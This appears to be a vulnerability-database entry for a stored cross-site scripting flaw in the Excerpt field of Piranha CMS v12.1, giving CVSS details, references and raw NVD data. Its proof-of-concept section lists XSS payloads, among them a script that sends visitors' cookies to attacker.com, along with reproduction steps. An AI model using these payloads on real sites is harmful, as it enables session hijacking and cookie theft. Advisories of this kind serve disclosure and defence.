CVE-2025-67290

Description

A stored cross-site scripting (XSS) vulnerability in the Page Settings module of Piranha CMS v12.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Excerpt field.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:dotnetfoundation:piranha_cms:12.1:*:*:*:*:*:*:* - VULNERABLE

Piranha CMS v12.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-67290 PoC - Stored XSS in Piranha CMS v12.1 -->
<!-- Inject this payload into the Excerpt field in Page Settings -->

Payload:
<script>alert(document.cookie)</script>

<!-- More advanced payload for session hijacking -->
<script>
  fetch('https://attacker.com/steal?cookie=' + document.cookie)
</script>

<!-- Image tag based XSS -->
<img src=x onerror="alert('XSS Triggered')">

<!-- Event handler based XSS -->
<body onload="alert(document.domain)">

<!-- Steps to reproduce:
1. Log in to Piranha CMS admin panel
2. Navigate to Pages > Page Settings
3. Find the Excerpt field
4. Inject the XSS payload above
5. Save the page
6. View the page as any user
7. The XSS will execute in the victim's browser
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67290
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67290
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67290/
[4] VulDB https://vuldb.com/cve/CVE-2025-67290
[5] http://piranha.com
[6] https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67290

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67290", "sourceIdentifier": "[email protected]", "published": "2025-12-22T20:15:45.100", "lastModified": "2026-01-02T17:43:02.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability in the Page Settings module of Piranha CMS v12.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Excerpt field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dotnetfoundation:piranha_cms:12.1:*:*:*:*:*:*:*", "matchCriteriaId": "9A207EFE-2C5E-429B-BEC2-29F89CF0EAE4"}]}]}], "references": [{"url": "http://piranha.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67290", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}